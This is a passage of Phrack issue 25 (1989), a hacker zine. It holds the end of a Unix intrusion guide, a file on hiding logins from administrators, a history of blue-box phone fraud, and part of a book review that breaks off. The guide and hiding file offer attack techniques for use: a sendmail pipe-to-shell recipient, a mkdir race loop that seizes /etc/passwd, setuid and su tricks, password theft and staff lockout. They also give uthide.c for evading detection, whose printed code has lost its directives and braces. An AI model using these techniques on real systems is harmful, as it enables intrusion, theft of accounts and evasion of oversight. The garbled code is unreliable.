editing the user structure.


A Common Trick:  When looking to gain more system privileges, one of the first
things to investigate are other users' .rhost files since these can be used to
grant access to other accounts without the use of a password.  See the Unix
manual entry for rlogin for more information.


Another thing to look for are writeable .profile, .cshrc or .logins (to name a
few).  It these are left writeable, it is all too easy to install a Trojan
horse.


Look for readable .netrc files since these files may contain passwords to other
accounts.


If the man command is setuid, it might be possible to get a shell by typing
"!/bin/csh" from within the pager.


Some types of terminals can be "instructed" to issue commands using various
escape sequences.  This makes it possible to mail someone a "letter bomb" that
(when read) will send commands to the user's shell.


It is possible to mail commands to a system.  This is a feature of the
debugging mode of Unix's sendmail.  This trick was made fairly public through
its use by the Internet Worm.  The way it is done is by connecting to the SMTP
socket/port and turning on the debug mode.  The recipient that is mailed to is
"| sed '1,/$/d' | /bin/sh ; exit 0" and then the commands for the shell are
placed in the body of the letter/data section.


Under Unix it is trivial to forge mail.  The easiest way this is done is by
connecting to the SMTP port and pretending to be a foreign mailer program.


Some systems will crash if you issue the command "eval `!!`" from within the
C shell (/bin/csh).


When searching for data, do not forget to look for possible un-mounted file
systems.  [eg:  Look for disk partitions that are unaccounted for.]


Other things to try are illegal system calls and system calls with
illegal (strange?) arguments.  A good example is the fchown system call
under 4.3-Tahoe Release from Berkeley.  If you give it a negative
number for the group argument it grants permission for you to change
the ownership of any file.  Another example (on many systems) is the
"access" system call used by many, many programs.  Its problem is that
is only checks permissions on the requested file and neglects to check
the permissions of links and directories that lead to the file.  I have
seen some systems that allow any user to use the chroot system call;
this is VERY foolish since all I have to do in construct my own
sub-environment (with my own configuration files) and execute certain
commands from within it.


Yet another thing to look for are system structures stored in user accessible
memory.  These structures can be modified to suit your purposes.


Look for sloppy permission/ownership on system directories and on system
configuration files.  These can allow you to modify and/or control many aspects
of system behavior.  Here are a few files to look out for:
"/etc/rc",
"/etc/passwd", "/etc/group", "/etc/profile",
"/usr/lib/crontab" or
"/usr/spool/cron/crontabs/*".

Hint:  AT&T 3b1 systems are notorious for this problem.


If the system you are hacking has readable system logfiles and it logs failed
login attempts, a possible leak might be if a user had accidentally typed their
password at the login prompt.  You should scan through these logs looking to
strange and nonexistent account names and use these as the password for users
that logged in around that time (the command "last" will list the login time of
users).


Check to see if the system has source code on-line.  There is nothing more
useful then having system source code on-line for browsing.
Look for source code (normally found in the directory /usr/src) and scan it
for programming errors (or download it so you spend less time on the
system).


Look for other people's back doors.  If you can find any, they can make your
life a bit easier.


Check to see if the system has a good auditing system.  If so, run it since it
may find a few security problems for you.


Look for setuid shell scripts that may be on the system.  There is no
way way to secure a setuid shell script under the current release of
BSDish Unixes in the current market.  The command "find / -perm -6000 -ls"
will print out all setuid and setgid files on a system.  Look
through this list for setuid shell scripts.  One way in defeating a
setuid script is to make a link named "-i" to the file, then execute
the link.  Another way is to send it a signal at the right moment
during its start up.  The simplest way do this is to write a quick C program tha
   t sets a block on the signal, then sends
itself the signal, and then execs a setuid script. (Note: The signal
will not be processed because of the block, thus leaving it for the
setuid script).   Either of these bugs should give you an interactive
shell running as the userid of the setuid script.


If you are familiar with programming with assemblers/dissemblers, you can look
for bugs and/or modify existing software to suit your needs since most
installations do not strip debugging symbols from system binaries and leave the
executables readable.  There is an enormous amount of hacking information that
can be learned this way.


Under UNIX-V7 & 4.1BSD, programs that were setgid were only a security problem
because if you were able to get them to dump a core file, the core would be
owned by you and setgid to the groupid of the program that generated it.  Since
you owned this file, you could copy a shell of a command script into it and
have it run as the groupid of the file.  This will allow you access to to any
file that is owned by the group.


If the system you are hacking supports bidirectional modems, it is possible to
use them for stealing passwords.  This can be done by using tip to connect to
the modem and then waiting for a user to call.  When a user calls in, you
simply answer the phone and simulate the login process.  Once the user has
surrendered their password, you simulate line noise and hang up.


The Unix login program (the program that prompts you for the account name and
password) is tricky in the way that the error message for bad accounts and bad
passwords are the same.  This is to stop account/password guessing.  I guess it
works if your only access to a system is either a terminal line or a modem
connection.  If you have access through a LAN you can check account names with
the finger command.  This neat little Unix goodie will give you all sorts of
information about people's accounts.  If the finger utility is turned off,
there is another way through a program called ftp.  The ftp (File Transfer
Program) command can be used to confirm the existence of a user account/bad
password selection.  I have also noted that the ftp command does not do as much
logging, thus repeated bad password guesses not logged as much via ftp.
[See next section also.]


If the Unix system you wish to crack is networked via UUCP or TCP/IP, it should
be fairly simple to extract the password file from the remote system using the
ftp utility.  Once you have a copy of the password file, you can simply back
away from the system (thus reducing the chances of getting caught!).


See Phrack Inc. Issue 22, File 6 -- "Yet Another File On Hacking Unix by
>Unknown User<" for a slow but effective password grinder.


Another network based attack involves tapping in on the LAN (Local Area
Network) and listening for people's passwords since most systems transmit them
in clear text.


On systems that disable account logins after N number of bad logins, it is
sometimes useful to use the feature to lock out staff members from logging in
thus giving you [the cracker] more time to clean up after yourself and escape.


Here are a few bugs in the su (set userid) command that may come in handy:

The first was that the "-c" option did not check to see if the user being su'ed
to had a valid shell.  The "-c" option is used to instruct the su command to
run another command instead of a shell [eg:  "su davis -c foobar" tells su to
run foobar instead of davis's default shell].  This comes in handy with
accounts like "sync::0:1::/:/bin/sync" because you can execute any arbitrary
command [eg: su sync -c /bin/csh].

Another bug in the su command exists in some System V ports where if su was
unable to open the password file ("etc/passwd"), it would grant root access
(without checking the reason for the failure).  I guess the programming can
tell that something is wrong and grants access so someone can fix things.  The
security problem occurs when when su is executed with a full file descriptor
table; this will force su to fail its open request on the password file.


Some Unix system's mkdir (MaKe DIRectory) command can be subverted into aiding
you in gaining root.  This is done by exploiting a race condition that can
occur between processes.  The following command script will eventually cause
the error to occur and cause the password file to be owned by you:

    while : ; do
        nice -10 (mkdir a;rm -fr a) &
        (rm -fr a; ln /etc/passwd a) &
    done

The race condition happens when the "ln" command runs while the mkdir command
is in the middle of running.  This works because the mkdir does its job by
doing the two system calls:  mknod and then chown.  If the now inode (allocated
by mknod) is replaced with a link to the password file before the chown system
call is made, then the password file is "chown"ed instead.  To become root from
here, all you have to do is add a new entry into the password file.


The print command ("lpr" or "lp") has an option to delete a file after it is
printed.  This option will work (print & delete the file) even if you do not
own the file.


The mail command has the option to save your mail after you read to another
file.  Some versions of this command will save (append) your mail to a file
after it is read.  A bug exists where the mail program does not check to see if
you have write permission to the file you are saving the mail to, thus allowing
you to (for example) add new accounts to the password file.


A quick word on the crypt command (and vi -x since it uses the crypt command):
The algorithm used is not hard to break (it takes about twenty minutes to
decrypt a file with the right tools).  See the "Bell Systems Technical
journal," Vol. 63, 8, part 2 for more information.


If the UUCP configuration files are readable [default on many systems], you can
obtain the login names, passwords, and phone numbers to all of the mail links
to and from the system you are hacking.  With the use of the a public domain
program, "uupc", you can make the connections yourself and intercept and/or
filter all incoming mail.

There are so many ways to crack Unix just through UUCP that I am not going to
expand and list the many ways and their permutations.  Instead, I am going to
save them for an article to be done at some random time in the future.


If you are hacking on a system that supports sharable memory you may be able to
access these memory segments.  On Sun systems, there is a command called ipcs.
This command lists available sharable memory segments.  If this command does
not exist (nor has a equivalent command available), you may have to either
write one or use blind exploration.  Once you have identified these segments,
you can gain control to the data contained therein and/or other programs
utilizing the data contained within.


If you are caught:  Grasp the bottle of "Wild Turkey" (the one near your
terminal) and drink it.

===============================================================


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 6 of 11

                             HIDING OUT UNDER UNIX

                              By BLACK TIE AFFAIR

                                March 25, 1989


Under Unix, a user can see who's currently logged into the system with commands
like 'who', 'finger' and 'w'.  All these programs gather parts or all of their
information by looking at the file /etc/utmp.

This file contains one record for each terminal connected to the system and
activated for logins.  The format of the record differs between the various
Unix versions, but there are common fields which exist on every popular Unix
descent:  The name of the terminal device (ut_line) and the name of the user
logged in on that line (ut_user).

Though the design of the Unix operating system is basically (!) consistent,
this scheme shows some problems.  The information whether a process is
considered to be a terminal session is not kept in the process itself, but in a
separate file.  Thus, it is the duty of user mode programs to keep this file up
to date, and gives an excellent point for a hacker to put his drill on.  To be
fair here, other operating systems have similar problems.  But we're talking
Unix currently.

There is another mechanism available under Unix, which can provide information
about terminal sessions:  The 'controlling tty'.  The first terminal device a
process opens becomes that process controlling tty.  Unix uses this information
internally to determine which processes should be signaled when the user types
one of the signal generating keys (CTRL-C, CTRL- etc.) on the terminal.  When
such a character is encountered by the terminal driver, all processes which
have this terminal device as controlling tty receive the signal corresponding
to that character.

A process is not needingly an interactive session if it has a controlling tty,
though.  Any process which opens a terminal device (which could be a network
process which uses a tty device for communication to another machine) has this
terminal as it's controlling tty.

As such, it is good practice to cross-check the contents of the utmp file with
all processes in the system which have a controlling tty.  Two shell scripts
which exactly do this on BSD and System V Unix systems are included at the end
of this file.  Both perform the same function:  They use who(1) to get a list
of the sessions mentioned in the utmp file, and ps(1) to get a list of all
processes currently running.  It outputs all processes which have a controlling
tty but are not visible with who(1).  A little flaw here is the fact that
getty processes waiting on a terminal for someone to log in are displayed.

The family of 'who'-programs just scans the utmp-file for entries which belong
to an active login session, and formats those records to be human-readable.
The decision whether an entry corresponds to an active session is different
under different Unix versions.  Those who have the old utmp file format (System
III, System 5R1, BSD) look at the ut_user field.  If the first byte is
non-null, the entry is considered to correspond to an active session.  Under
System 5 since release 2, the utmp structure has been enhanced to contain a
type field (ut_type) which tells about the type of the entry.  who(1) only
displays a record, when the ut_type field contains the value USER_PROCESS (as
defined in /usr/include/utmp.h).  Other records are ignored unless the -a
option is specified to who(1).

Being invisible to the who-family of programs gives some advantage to a hacker.
He can stay in the system with a degraded risk of being discovered by a system
manager who spies around.  Of course, a system with a properly protected utmp
file is not vulnerable to this kind of hide out, provided that the hacker
didn't manage to get root access.  For clearance, a little C program which
demonstrates this kind of hideout is included in the shar file at the end of
this article.  Just compile and run it with proper permissions to see how to
hide.

! /bin/sh
 This is a shell archive.  Remove anything before this line, then feed it
 into a shell via "sh file" or similar.  To overwrite existing files,
 type "sh file -c".
 The tool that generated this appeared in the comp.sources.unix newsgroup;
 send mail to comp-sources-unix@uunet.uu.net if you want that tool.
 If this archive is complete, you will see the following message at the end:
               "End of shell archive."
 Contents:  check.bsd check.sysv uthide.c
PATH=/bin:/usr/bin:/usr/ucb ; export PATH
if test -f 'check.bsd' -a "$1" != "-c" ; then
  echo shar: Will not clobber existing file "'check.bsd'"
else
echo shar: Extracting "'check.bsd'" (305 characters)
sed "s/^X//" >'check.bsd' <<'END_OF_FILE'
X:
X
X(who ; echo "___" ; ps au) | awk '
X              if ($0 == "___")
X                       pslist = 1
X                       next
X
X               if ( pslist )
X                       if (ttys[$7] == 0)
X                               print $0
X
X                else
X                       if (substr($2, 0, 3) == "tty")
X                               id = substr($2, 4, 2)
X                               ttys[id] = 1
X                        else
X                               if ($2 == "console")
X                                       ttys["co"] = 1
X
X
X

END_OF_FILE
if test 306 -ne `wc -c <'check.bsd'`; then
    echo shar: "'check.bsd'" unpacked with wrong size!
fi
 end of 'check.bsd'
fi
if test -f 'check.sysv' -a "$1" != "-c" ; then
  echo shar: Will not clobber existing file "'check.sysv'"
else
echo shar: Extracting "'check.sysv'" (312 characters)
sed "s/^X//" >'check.sysv' <<'END_OF_FILE'
X:
X
X(who ; echo "___" ; ps -fe) | awk '
X              if ($0 == "___")
X                       pslist = 1
X                       next
X
X               if ( pslist )
X                       if ($6 != "?" && ttys[$6] == 0)
X                               print $0
X
X                else
X                       if (substr($2, 0, 3) == "tty")
X                               id = substr($2, 4, 2)
X                               ttys[id] = 1
X                        else
X                               if ($2 == "console")
X                                       ttys["co"] = 1
X
X

END_OF_FILE
if test 313 -ne `wc -c <'check.sysv'`; then
    echo shar: "'check.sysv'" unpacked with wrong size!
fi
 end of 'check.sysv'
fi
if test -f 'uthide.c' -a "$1" != "-c" ; then
  echo shar: Will not clobber existing file "'uthide.c'"
else
echo shar: Extracting "'uthide.c'" (1295 characters)
sed "s/^X//" >'uthide.c' <<'END_OF_FILE'
X/* hide.c - needs write access to /etc/utmp */
X
Xinclude <sys/types.h>
Xinclude <utmp.h>
Xinclude <fcntl.h>
X
Xdefine UTMP "/etc/utmp"
X
Xifndef INIT_PROCESS
X/* this is some system with this useless utmp format.  we assume bsd, but
X * it could well be system III or some other historic version.  but come
X * on, guys -- go the modern way ;-)
X */
Xdefine        BSD
Xendif
X
Xifdef BSD
Xdefine        strrchr rindex
Xelse
Xdefine bzero(s,n) memset(s,'',n)
Xendif
X
Xchar *
Xbasename(path)
X
X       char    *path;
X      char    *p, *strrchr();
X
X       return((path && (p = strrchr(path, '/'))) ? p+1 : path);
X
X
Xmain()
X
X      struct  utmp    ut;
X       int             fd;
X       char            *strrchr();
X       char            *ttyname(), *tty = basename(ttyname(0));
X
X       if (!tty)
X               puts("not on a tty");
X               exit(1);
X
X
X       if ((fd = open(UTMP, O_RDWR)) < 0)
X               perror(UTMP);
X               exit(2);
X
X
X       while (read(fd, &ut, sizeof(ut)) == sizeof(ut))
X               if (!strncmp(ut.ut_line, tty, sizeof(ut.ut_line)))
X                       bzero(ut.ut_name, sizeof(ut.ut_name));
Xifndef BSD
X                       ut.ut_type = INIT_PROCESS;
X                       ut.ut_pid = 1;
Xelse
X                       bzero(ut.ut_host, sizeof(ut.ut_host));
Xendif BSD
X                       if (lseek(fd, -sizeof(ut), 1) < 0)
X                               puts("seek error");
X                               exit(3);
X
X                       if (write(fd, &ut, sizeof(ut)) != sizeof(ut))
X                               puts("write error");
X                               exit(4);
X
X                       exit(0);
X
X
X
X       puts("you don't exist");
X       exit(5);
X

END_OF_FILE
if test 1296 -ne `wc -c <'uthide.c'`; then
    echo shar: "'uthide.c'" unpacked with wrong size!
fi
 end of 'uthide.c'
fi
echo shar: End of shell archive.
exit 0
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 7 of 11

      ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^
      ^*^                                                             ^*^
      ^*^                  The Blue Box And Ma Bell                   ^*^
      ^*^                                                             ^*^
      ^*^                 Brought To You by The Noid                  ^*^
      ^*^                                                             ^*^
      ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^


        "...The user placed the speaker over the telephone handset's
         transmitter and simply pressed the buttons that corresponded
         to the desired CCITT tones.  It was just that simple."


                          THE BLUE BOX AND MA BELL
                          ~~~~~~~~~~~~~~~~~~~~~~~~

Before the breakup of AT&T, Ma Bell was everyone's favorite enemy.  So it was
not surprising that so many people worked so hard and so successfully at
perfecting various means of making free and untraceable telephone calls.
Whether it was a BLACK BOX used by Joe and Jane College to call home, or a BLUE
BOX used by organized crime to lay off untraceable bets, the technology that
provided the finest telephone system in the world contained the seeds of its
own destruction.

The fact of the matter is that the Blue Box was so effective at making
untraceable calls that there is no estimate as to how many calls were made
or lost revenues of $100, $100-million, or $1-billion on the Blue Box.  Blue
Boxes were so effective at making free, untraceable calls that Ma Bell didn't
want anyone to know about them, and for many years denied their existence. They
even went as far as strongarming a major consumer-science magazine into killing
an article that had already been prepared on the Blue and Black boxes.
Furthermore, the police records of a major city contain a report concerning a
break-in at the residence of the author of that article.  The only item missing
following the break-in was the folder containing copies of one of the earliest
Blue-Box designs and a Bell-System booklet that described how subscriber
billing was done by the AMA machine -- a booklet that Ma Bell denied ever
existed.  Since the AMA (Automatic Message Accounting) machine was the means
whereby Ma Bell eventually tracked down both the Blue and Black Boxes, I'll
take time out to explain it.  Besides, knowing how the AMA machine works will
help you to better understand Blue and Black Box "phone phreaking."


Who Made The Call?
~~~~~~~~~~~~~~~~~~
Back in the early days of the telephone, a customer's billing originated in a
mechanical counting device, which was usually called a "register" or a "meter."
Each subscriber's line was connected to a meter that was part of a wall of
meters.  The meter clicked off the message units, and once a month someone
simply wrote down the meter's reading, which was later interpolated into
message-unit billing for those subscriber's who were charged by the message
unit.  (Flat-rate subscriber's could make unlimited calls only within a
designated geographic area.  The meter clicked off message units for calls
outside that area.)  Because eventually there were too many meters to read
individually, and because more subscribers started questioning their monthly
bills, the local telephone companies turned to photography.  A photograph of a
large number of meters served as an incontestable record of their reading at a
given date and time, and was much easier to convert to customer billing by the
accounting department.

As you might imagine, even with photographs, billing was cumbersome and did not
reflect the latest technical developments.  A meter didn't provide any
indication of what the subscriber was doing with the telephone, nor did it
indicate how the average subscriber made calls or the efficiency of the
information service (how fast the operators could handle requests).  So the
meters were replaced by the AMA machine.  One machine handled up to 20,000
subscribers.  It produced a punched tape for a 24-hour period that showed,
among other things, the time a phone was picked up (went off-hook), the number
dialed, the time the called party answered, and the time the originating phone
was hung up (placed on-hook).

One other point, which will answer some questions that you're certain to think
of as we discuss the Black & Blue boxes:  Ma Bell did not want persons outside
their system to know about the AMA machine.  The reason:  Almost everyone
had complaints -- usually unjustified -- about their billing.  Had the public
been aware of the AMA machine they would have asked for a monthly list of their
telephone calls.  It wasn't that Ma Bell feared errors in billing; rather,
they were fearful of being buried under any avalanche of paperwork and customer
complaints.  Also, the public believed their telephone calls were personal and
untraceable, and Ma Bell didn't want to admit that they knew about the who,
when, and where of every call.  And so Ma Bell always insisted that billing was
based on a meter that simply "clicked" for each message unit; that there was no
record, other than for long-distance as to who called whom.  Long distance was
handled by, and the billing information was done by an operator, so there was a
written record Ma Bell could not deny.

The secrecy surrounding the AMA machine was so pervasive that local, state, and
even federal police were told that local calls made by criminals were
untraceable, and that people who made obscene telephone calls could not be
tracked down unless the person receiving the call could keep the caller on the
line for some 30 to 50 minutes so the connections could be physically traced by
technicians.  Imagine asking a woman or child to put up with almost an hour's
worth of the most horrendous obscenities in the hope someone could trace the
line.  Yet in areas where the AMA machine had replaced the meters, it would
have been a simple, though perhaps time-consuming task, to track down the
numbers called by any telephone during a 24 hour period.  But Ma Bell wanted
the AMA machine kept as secret as possible, and so many a criminal was not
caught, and many a woman was harassed by the obscene calls of a potential
rapist, because existence of the AMA machine was denied.

As a sidelight as to the secrecy surrounding the AMA machine, someone at Ma
Bell or the local operating company decided to put the squeeze on the author of
the article on Blue Boxes, and reported to the Treasury Department that he was,
in fact, manufacturing them for organized crime -- the going rate in the mid
1960's was supposedly $20,000 a box.  (Perhaps Ma Bell figured the author would
get the obvious message:  Forget about the Blue Box and the AMA machine or
you'll spend lots of time, and much money on lawyer's fees to get out of the
hassles it will cause.)  The author was suddenly visited at his place of
employment by a Treasury agent.

Fortunately, it took just a few minutes to convince the agent that the author
was really just that, and not a technical wizard working for the mob.  But one
conversation led to another, and the Treasury agent was astounded to learn
about the AMA machine.  (Wow! Can an author whose story is squelched spill his
guts.)  According to the Treasury agent, his department had been told that it
was impossible to get a record of local calls made by gangsters:  The Treasury
department had never been informed of the existence of automatic message
accounting.  Needless to say, the agent left with his own copy of the Bell
System publication about the AMA machine, and the author had an appointment
with the local Treasury-Bureau director to fill him in on the AMA machine.
That information eventually ended up with Senator Dodd, who was conducting a
congressional investigation into, among other things, telephone company
surveillance of subscriber lines -- which was a common practice for which there
was detailed instructions, Ma Bell's own switching equipment ("crossbar")
manual.

The Blue Box
~~~~~~~~~~~~
The Blue Box permitted free telephone calls because it used Ma Bell's own
internal frequency-sensitive circuits.  When direct long-distance dialing was
introduced, the crossbar equipment knew a long-distance call was being dialed
by the three-digit area code.  The crossbar then converted the dial pulses to
the CCITT tone groups, shown in the attached table (at the end of this file),
that are used for international and trunkline signaling.  (Note that those do
not correspond to Touch-Tone frequencies.)  As you will see in that table, the
tone groups represent more than just numbers; among other things there are tone
groups identified as 2600 hertz, KP (prime), and ST (start) -- keep them in
mind.

When a subscriber dialed an area code and a telephone number on a rotary-dial
telephone, the crossbar automatically connected the subscriber's telephone to a
long-distance trunk, converted the dial pulses to CCITT tones, set up
electronic cross-country signaling equipment, and recorded the originating
number and the called number on the AMA machine.  The CCITT tones sent out on
the long-distance trunk lines activated special equipment that set up or
selected the routing and caused electro-mechanical equipment in the target city
to dial the called telephone.

Operator-assisted long-distance calls worked the same way.  The operator simply
logged into a long-distance trunk and pushed the appropriate buttons, which
generated the same tones as direct-dial equipment.  The button sequence was
2600 hertz, KP (which activated the long-distance equipment), then the complete
area code and telephone number.  At the target city, the connection was made to
the called number but ringing did not occur until the operator there pressed
the ST button.

The sequence of events of early Blue Boxes went like this:  The caller dialed
information in a distant city, which caused his AMA machine to record a free
call to information.  When the information operator answered, he pressed the
2600 hertz key on the Blue Box, which disconnected the operator and gave him
access to a long-distance trunk.  He then dialed KP and the desired number and
ended with an ST, which caused the target phone to ring.  For as long as the
conversation took place, the AMA machine indicated a free call to an
information operator.  The technique required a long-distance information
operator because the local operator, not being on a long distance trunk, was
accessed through local wire switching, not the CCITT tones.

Call Anywhere
~~~~~~~~~~~~~
Now imagine the possibilities.  Assume the Blue Box user was in Philadelphia.
He would call Chicago information, disconnect from the operator with a KP tone,
and then dial anywhere that was on direct-dial service:  Los Angeles, Dallas,
or anywhere in the world if the Blue Boxer could get the international codes.

The legend is often told of one Blue Boxer who, in the 1960's, lived in New
York and had a girl friend at a college near Boston. Now back in the 1960's,
making a telephone call to a college town on the weekend was even more
difficult than it is today to make a call from New York to Florida on a
reduced-rate holiday using one of the cut-rate long-distance carriers.  So our
Blue Boxer got on an international operator's circuit to Rome, Blue Boxed
through to a Hamburg operator, and asked Hamburg to patch through to Boston.
The Hamburg operator thought the call originated in Rome and inquired as to the
"operator's" good English, to which the Blue Boxer replied that he was an
expatriate hired to handle calls by American tourists back to their homeland.
Every weekend, while the Northeast was strangled by reduced-rate long-distance
calls, our Blue Boxer had no trouble sending his voice almost 7,000 miles for
free.

...The user placed the speaker over the telephone handset's transmitter and
simply pressed the buttons that corresponded to the desired CCITT tones.  It
was just that simple.

Actually, it was even easier than it reads because Blue Boxers discovered they
did not need the operator.  If they dialed an active telephone located in
certain nearby, but different, area codes, they could Blue Box just as if they
had Blue Boxed through an information operator's circuit.  The subscriber whose
line was Blue Boxed simply found his phone was dead when it was picked up.  But
if the Blue Box conversation was short, the "dead" phone suddenly came to life
the next time it was picked up.  Using a list of "distant" numbers, a Blue
Boxer would never hassle anyone enough times to make them complain to the
telephone company.

The difference between Blue Boxing off of a subscriber rather than an
information operator was that the AMA tape indicated a real long-distance
telephone call perhaps costing 15 or 25 cents -- instead of a freebie.  Of
course that is the reason why when Ma Bell finally decided to go public with
"assisted" newspaper articles about the Blue Box users they had apprehended, it
was usually about some college kid or "phone phreak."  One never read of a
mobster being caught.  Greed and stupidity were the reasons why the kid's were
caught.

It was the transistor that led to Ma Bell going public with the Blue Box.  By
using transistors and RC phase-shift networks for the oscillators, a portable
Blue Box could be made inexpensively, and small enough to be used unobtrusively
from a public telephone.  The college crowd in many technical schools went
crazy with the portable Blue Box; they could call the folks back home, their
friends, or get a free network (the Alberta and Carolina connections -- which
could be a topic for a whole separate file) and never pay a dime to Ma Bell.

Unlike the mobsters who were willing to pay a small long-distance charge when
Blue Boxing, the kids wanted it, wanted it all free, and so they used the
information operator routing, and would often talk "free-of-charge" for hours
on end.

Ma Bell finally realized that Blue Boxing was costing them Big Bucks, and
decided a few articles on the criminal penalties might scare the Blue Boxers
enough to cease and desist.  But who did Ma Bell catch?  The college kids and
the greedies.  When Ma Bell decided to catch the Blue Boxers she simply
examined the AMA tapes for calls to an information operator that were
excessively long.  No one talked to an operator for 5, 10, 30 minutes, or
several hours.  Once a long call to an operator appeared several times on an
AMA tape, Ma Bell simply monitored the line and the Blue Boxer was caught.
(Now you should understand why I opened with an explanation of the AMA
machine.)  If the Blue Boxer worked from a telephone booth, Ma Bell simply
monitored the booth.  Ma Bell might not have known who originated the call, but
she did know who got the call and getting that party to spill their guts was no
problem.

The mob and a few Blue Box hobbyists (maybe even thousands) knew of the AMA
machine, and so they used a real telephone number for the KP skip.  Their AMA
tapes looked perfectly legitimate.  Even if Ma Bell had told the authorities
they could provide a list of direct-dialed calls made by local mobsters, the
AMA tapes would never show who was called through a Blue Box.  For example, if
a bookmaker in New York wanted to lay off some action in Chicago, he could make
a legitimate call to a phone in New Jersey and then Blue Box to Chicago.  His
AMA tape would show a call to New Jersey.  Nowhere would there be a record of
the call to Chicago.  Of course, automatic tone monitoring, computerized
billing, and ESS (Electronic Switching System) now makes that virtually
impossible, but that's the way it was.

You might wonder how Ma Bell discovered the tricks of Blue Boxers.  Simple,
they hired the perpetrators as consultants.  While the initial newspaper
articles detailed a potential jail penalties for apprehended blue boxers,
except for Ma Bell employees who assisted a blue boxer, it is almost impossible
to find an article on the resolution of the cases because most hobbyist blue
boxers got suspended sentences and/or probation if they assisted Ma Bell in
developing anti-blue box techniques.  It is asserted, although it can't be
easily proven, that cooperating ex-blue boxers were paid as consultants.  (If
you can't beat them, hire them to work for you.)

Should you get any ideas about Blue Boxing, keep in mind that modern switching
equipment has the capacity to recognize unauthorized tones.  It's the reason
why a local office can leave their subscriber Touch-Tone circuits active,
almost inviting you to use the Touch-Tone service.  A few days after you use an
unauthorized Touch-Tone service, the business office will call and inquire
whether you'd like to pay for the service or have it disconnected.  The very
same central-office equipment that knows you're using Touch-Tone frequencies
knows if your line is originating CCITT signals

The Black Box
~~~~~~~~~~~~~
The Black Box was primarily used by the college crowd to avoid charges when
frequent calls were made between two particular locations, say the college and
a student's home.  Unlike the somewhat complex circuitry of a Blue Box, a Black
Box was nothing more than a capacitor, a momentary switch, and a battery.

As you recall from our discussion of the Blue Box, a telephone circuit is
really established before the target phone ever rings, and the circuit is
capable of carrying an AC signal in either direction.  When the caller hears
the ringing in his or her handset, nothing is happening at the receiving end
because the ringing signal he hears is really a tone generator at his local
telephone office.  The target (called) telephone actually gets its 20
pulses-per-second ringing voltage when the person who dialed hears nothing in
the "dead" spaces between hearing the ringing tone.  When the called phone is
answered and taken off hook, the telephone completes a local-office DC loop
that is the signal to stop the ringing voltage.  About three seconds later the
DC loop results in a signal being sent all the way back to the caller's AMA
machine that the called telephone was answered.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

                            CCITT NUMERICAL CODE
                            ~~~~~~~~~~~~~~~~~~~~
    Digit      Frequencies (Hz)

    1          700+900
    2          700+1100
    3          900+1100
    4          700+1300
    5          900+1300
    6          1100+1300
    7          700+1500
    8          900+1500
    9          1100+1500
    0          1300+1500
    Code 11    700+1700  for inward
    Code 12    900+1700  operators
    KP         1100+1700  Prime (Start of pulsing)
    KP2        1300+1700  Transit traffic
    ST         1500+1700  Start (End of pulsing)
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 8 of 11

        /**/**/**/**/**/**/**/**/**/**/**/**/**/**/**/*\n        */                                                         */
        /*          Hacking:  What's Legal And What's Not          /*\n        */              Written by Xandor SymmLeo Xet              */
        /*         With Technical Assistance From The ICH          /*\n        */                                                         */
        /*     Reviewed by HATCHET MOLLY (TK0GRM1@NIU.BITNET)      /*\n        */               Exclusively for Phrack Inc.               */
        /*                                                         /*\n        */                      March 8, 1989                      */
        /*                                                         /*\n        */**/**/**/**/**/**/**/**/**/**/**/**/**/**/**/


"Hacking:  What's Legal And What's Not" was originally published in 1987 by
"HackTel Communications" of Crosby, Texas.  Reportedly the book is no longer
being published as the author, Xandor SymmLeo Xet, has joined the United States
Army.  E. Arthur Brown of Minnesota has bought out the remaining stock and is
selling it for $12.95 (plus postage and handling) which is about half off it's
"cover price" of $25.00.

We've always been taught not to judge a book by its' cover, and I suppose that
one should not expect beautiful binding and great illustrations in
self-published books, especially those that deal with hacking and phreaking.
But I can't help comment on the sheer ugliness of this volume.  To be fair, I
should preface these remarks by saying that E. Arthur Brown Company does
give fair warning about the packaging of this book in their advertisement.

The "book" consist of about 300 photocopied reproductions of non-NLQ dot matrix
pages.  However, this does not mean you get three hundred pages of information
as about half of the pages are single sided copies.  All in all I'd say it
could be reduced to about 200 pages if everything was copied back to back.
These pages come in a nice three ring binder, black in color, and it even has
the name of the book silk screened on the cover.  (I can't resist mentioning
that the title of the book is improperly punctuated on the cover, though it is
correct inside the manuscript.)

Presumably the author(s) intended to release follow up reports and addendum to
the book at later dates (and at additional cost).  So the three-ring binder
approach makes sense, and the author does explain that he has used single sided
copies in some places to allow for easy insertation of these "Hacker Reports."
So perhaps criticisms of the books packaging are a little unfair since it
appears these concessions were made with a purpose in mind.  This does not,
however, change what you do indeed get when you order this book.  All potential
buyers should be aware of what they are getting for their money.

Enough of what the book looks like, let's examine what it has to offer.
Generally speaking, it is a cross between a "how to" and a legal reference
guide.  Much of the book is dedicated to state and federal laws that deal with
hacking, phreaking, and pirating.  You'll find reprints of the state computer
crime laws for every state of the union, (current at the time the book was
written) and the Federal wire fraud and copyright laws.  It does not include
the Federal Electronic Communication Privacy Act (ECPA) perhaps because act was
not passed at the time the book was compiled.  The sections on state laws
appear complete enough, and the full source and appropriate references are
given if you want to check them for accuracy or changes.  Thoughtfully, the
author has even included the associated penalties each statute carries.  And
for those of you who aren't quite up on your Latin, there is even a (very)
short legal glossary so you can better understand the language of the law.

The crime laws make up the bulk of the book.  They are probably the most useful
section despite the fact that the information is at least three years old by
now.  The rest of the book is dedicated to various topics that are mundane to
anyone that is an active practitioner of phreaking and/or hacking.  Topics like
"what is a network" and "how does a war dialer work" really do little for the
accomplished hacker, and the public can get the same information in the better
written book by Bill Landreth.

One point that interested me is that Xet adheres more to the "computer
professional" definition of "hacker" than he does to the definition used by
most of the underground.   In other words, he maintains that people who gain
unauthorized access to systems are "crackers," not "hackers."  He, like many
phreak/hackers, gets upset when the media uses the term incorrectly, but his
reasoning is a little different from most.  Interestingly enough, despite an
entire chapter on software piracy, Xet does not realize that "cracker" already
refers to a specific type of activity and suggesting it as an alternative to
